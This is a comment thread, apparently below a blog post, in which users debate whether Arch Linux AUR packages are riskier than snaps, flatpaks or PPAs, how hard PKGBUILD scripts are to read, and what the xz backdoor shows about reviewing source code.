Sigh. Alas, over the last few weeks, I've written multiple times about the risks of unverified packages from online stores. The modern world is not a friendly place. Mrk
True. But it should be noted that the (unofficial) AUR is still a less risky place compared to, e.g., ppa ˋs in Ubuntu or snaps or flatpaks. In those cases you are installing (potentially modified) binaries which you can’t really verify. In the case of an AUR package you have to trust the source (if you don’t, why would you install it in the first place?), but the PKGBUILD is rather easy to read so it is relatively easy to check if it’s doing shady things. So the crucial thing is that users should carefully check the PKGBUILD before installing an AUR package (and the diffs when updating it) - which is recommended again and again but, unfortunately, neglected by many users. Even worse, they often use the unofficial Chaotic repository which blindly offers most AUR packages without checking them, AFAIK. This is pure horror for every experienced Arch user.
Not really. If you're instaling a verified snap or flatpak, there's some assurance that you're getting what you think you're getting. Especially with snaps, as Canonical as a company has an extra duty to vet what goes into its store. PKGBUILD is only easy to read if you're super-uber-extra nerdy and know your way around. After all, the xz fiasco shows that even with the source code in the open, things are not trivial to examine. It took actual testing to discover the problem. PPAs can be ok if official, but again, if not, and/or not by the upstream developer, and similarly, unverified snaps or flatpaks, you don't know what you're getting. Could be perfectly fine, or not. Mrk
Yes, if they are verified. But there are many flatpaks (I don’t know about snaps) which are not „official“. Well, I don’t find them very difficult to read. But anyway, it is not recommended for newbies to install AUR packages if they don’t know what they are doing. There is a reason why they can’t be simply installed with pacman. Yes, but that is not really related to the problem with „unverified“ packages. The xz infection was really very tricky. Indeed.
The xz merely shows that even if have the source, very few people if any can figure out what's happening. There are both verified and unverified snaps and flatpaks. The problem is that most distro package managers will show both, by default. Now, you not finding them difficult to read that puts you in something like 0.001% of the population, you realize that? Mrk
Which population? Arch Linux (with emphasis on Arch) and AUR are not dedicated for general population, but anyway let's assume general EU population for the sake of easy-to-obtain data. Source: https://ec.europa.eu/eurostat/statistics-explained/index.php?title=ICT_specialists_in_employment https://ec.europa.eu/eurostat/statistics-explained/index.php?title=Population_structure_and_ageing This means 2,23% of general EU population is considered to be ICT specialists. General population includes i.e. very young children etc, which of course should not be let to download anything they want to computer and non of them are ICT specialists (yet). Yes, I understand only some of ICT specialists manage and run Linux systems of any kind, though they should really quickly be able to pick that skill up. And if somebody removes people who only theoreticaly could pick that skill up from numerator, then denominator should be completly changed from general population to only Arch Linux users. Either way it won't be below 1%. My point: being able to read Bash script isn't really that special anymore and you understimate that by 2 or 3 orders of magnitude.
The results prove me right, unfortunately. Also, being an IT specialist also includes: data center technicians, windows people, database people, mainframe people, etc. Most of these never have to touch any bash script. They also wouldn't know if file1.bin is good and if file2.bin is bad. So, to answer the question, any population. Mrk
